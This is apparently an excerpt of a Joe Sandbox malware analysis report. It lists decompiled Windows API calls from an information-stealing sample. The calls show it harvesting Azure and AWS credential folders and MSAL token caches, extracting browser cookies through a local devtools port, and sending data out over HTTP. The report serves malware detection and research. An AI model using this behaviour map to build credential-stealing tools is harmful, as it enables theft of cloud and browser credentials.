                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • InternetCloseHandle.WININET(00000000), ref: 00406017
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                            • String ID: "$"$------$------$------$S`A$S`A
                                            • API String ID: 1406981993-1449208648
                                            • Opcode ID: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                            • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                            • Opcode Fuzzy Hash: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                            • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                            APIs
                                            • memset.MSVCRT ref: 00414FD7
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            • memset.MSVCRT ref: 00415063
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            • memset.MSVCRT ref: 004150EF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                              • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,009D1EC0,?,000003E8), ref: 00414C9A
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                              • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                              • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                            • memset.MSVCRT ref: 0041517B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                            • API String ID: 4017274736-974132213
                                            • Opcode ID: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                            • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                            • Opcode Fuzzy Hash: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                            • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                            • lstrcatA.KERNEL32(?,00000000,009C9560,0042156C,009C9560,00421568,00000000), ref: 0040D308
                                            • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                            • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                            • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                            • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                            • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                            • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                            • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            • lstrlenA.KERNEL32(?), ref: 0040D42A
                                            • lstrlenA.KERNEL32(?), ref: 0040D439
                                            • memset.MSVCRT ref: 0040D488
                                              • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 2775534915-0
                                            • Opcode ID: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                            • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                            • Opcode Fuzzy Hash: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                            • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245D2EA
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0245D42E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0245D435
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D56F
                                            • lstrcat.KERNEL32(?,00421570), ref: 0245D57E
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D591
                                            • lstrcat.KERNEL32(?,00421574), ref: 0245D5A0
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D5B3
                                            • lstrcat.KERNEL32(?,00421578), ref: 0245D5C2
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D5D5
                                            • lstrcat.KERNEL32(?,0042157C), ref: 0245D5E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D5F7
                                            • lstrcat.KERNEL32(?,00421580), ref: 0245D606
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D619
                                            • lstrcat.KERNEL32(?,00421584), ref: 0245D628
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D63B
                                            • lstrcat.KERNEL32(?,00421588), ref: 0245D64A
                                              • Part of subcall function 0246AD97: lstrlen.KERNEL32(024551BC,?,?,024551BC,00420DDF), ref: 0246ADA2
                                              • Part of subcall function 0246AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0246ADFC
                                            • lstrlen.KERNEL32(?), ref: 0245D691
                                            • lstrlen.KERNEL32(?), ref: 0245D6A0
                                            • memset.MSVCRT ref: 0245D6EF
                                              • Part of subcall function 0246AFE7: StrCmpCA.SHLWAPI(00000000,00421568,0245D509,00421568,00000000), ref: 0246B006
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245D71B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 1973479514-0
                                            • Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                            • Instruction ID: e29e95b9379b14abb9e22ba79196e72443c02612f9917f30d5475e9cddc32af4
                                            • Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                            • Instruction Fuzzy Hash: 4EE11071D00628ABCB08EBA1DD59DFE773AAF14301F50455EF546B60A0EF35AA48CF62
                                            APIs
                                              • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                            • memset.MSVCRT ref: 00409C33
                                            • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                            • memset.MSVCRT ref: 00409C9A
                                            • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                            • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                            • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                            • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                            • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                            • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                            • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                            • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • memset.MSVCRT ref: 00409D7E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                            • API String ID: 689835475-3542011879
                                            • Opcode ID: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                            • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                            • Opcode Fuzzy Hash: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                            • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02455CAF
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 02455CCA
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02455E4A
                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 02456128
                                            • lstrlen.KERNEL32(00000000), ref: 02456139
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0245614A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02456151
                                            • lstrlen.KERNEL32(00000000), ref: 02456166
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 0245617D
                                            • lstrlen.KERNEL32(00000000), ref: 0245618F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 024561A8
                                            • memcpy.MSVCRT(?), ref: 024561B5
                                            • lstrlen.KERNEL32(00000000,?,?), ref: 024561D2
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 024561E6
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02456203
                                            • InternetCloseHandle.WININET(00000000), ref: 02456267
                                            • InternetCloseHandle.WININET(00000000), ref: 02456274
                                            • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 02455EAF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • InternetCloseHandle.WININET(00000000), ref: 0245627E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                            • String ID:
                                            • API String ID: 1703137719-0
                                            • Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                            • Instruction ID: 5760c5bb9318cd5c38060eb95dfdec9936f3067f20ba7c315ce143fcf0bdf280
                                            • Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                            • Instruction Fuzzy Hash: 8C12BA72950638AACB19EBA1DC98EFEB37ABF14701F50459EE14672090EF706E48CF51
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009D02E8,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                            • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                            • StrStrA.SHLWAPI(?,009D00A8,00420B56), ref: 0040CBF7
                                            • StrStrA.SHLWAPI(00000000,009D00D8), ref: 0040CC1E
                                            • StrStrA.SHLWAPI(?,009D0E08,00000000,?,00421550,00000000,?,00000000,00000000,?,009C9430,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                            • StrStrA.SHLWAPI(00000000,009D0DE8), ref: 0040CDB9
                                              • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                              • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009C94A0), ref: 0040C971
                                              • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                              • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                            • StrStrA.SHLWAPI(?,009D0DE8,00000000,?,00421554,00000000,?,00000000,009C94A0), ref: 0040CE5A
                                            • StrStrA.SHLWAPI(00000000,009C96A0), ref: 0040CE71
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                            • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                            • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 1564132460-3916222277
                                            • Opcode ID: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                            • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                            • Opcode Fuzzy Hash: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                            • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 0245CDD3
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0245CDF0
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0245CDFC
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0245CE0F
                                            • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0245CE1C
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0245CE40
                                            • StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 0245CE5E
                                            • StrStrA.SHLWAPI(00000000,006D6D64), ref: 0245CE85
                                            • StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 0245D009
                                            • StrStrA.SHLWAPI(00000000,006D6ECC), ref: 0245D020
                                              • Part of subcall function 0245CB87: memset.MSVCRT ref: 0245CBBA
                                              • Part of subcall function 0245CB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0245CBD8
                                              • Part of subcall function 0245CB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0245CBE3
                                              • Part of subcall function 0245CB87: memcpy.MSVCRT(?,?,?), ref: 0245CC79
                                            • StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 0245D0C1
                                            • StrStrA.SHLWAPI(00000000,006D6FA8), ref: 0245D0D8
                                              • Part of subcall function 0245CB87: lstrcat.KERNEL32(?,00420B47), ref: 0245CCAA
                                              • Part of subcall function 0245CB87: lstrcat.KERNEL32(?,00420B4B), ref: 0245CCBE
                                              • Part of subcall function 0245CB87: lstrcat.KERNEL32(?,00420B4E), ref: 0245CCDF
                                            • lstrlen.KERNEL32(00000000), ref: 0245D1AB
                                            • CloseHandle.KERNEL32(00000000), ref: 0245D203
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 1564132460-3916222277
                                            • Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                            • Instruction ID: e8ebadba69ed8eeeae8470a67bf846b2633352bbbbbe28877c680f4f67554879
                                            • Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                            • Instruction Fuzzy Hash: C0E1FD71940528ABCB19EBE5DC98EFEB77AAF58300F40415EF146B6190EF306A49CF52
                                            APIs
                                            • memset.MSVCRT ref: 0245A0AE
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                            • wsprintfA.USER32 ref: 0245A0E6
                                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0245A10A
                                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0245A133
                                            • memset.MSVCRT ref: 0245A154
                                            • lstrcat.KERNEL32(00000000,?), ref: 0245A16A
                                            • lstrcat.KERNEL32(00000000,?), ref: 0245A17E
                                            • lstrcat.KERNEL32(00000000,004212D8), ref: 0245A190
                                            • memset.MSVCRT ref: 0245A1A4
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0245A1E3
                                            • memset.MSVCRT ref: 0245A203
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0245A26B
                                            • Sleep.KERNEL32(00001388), ref: 0245A27A
                                            • CloseDesktop.USER32(00000000), ref: 0245A2C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                            • String ID: D
                                            • API String ID: 1347862506-2746444292
                                            • Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
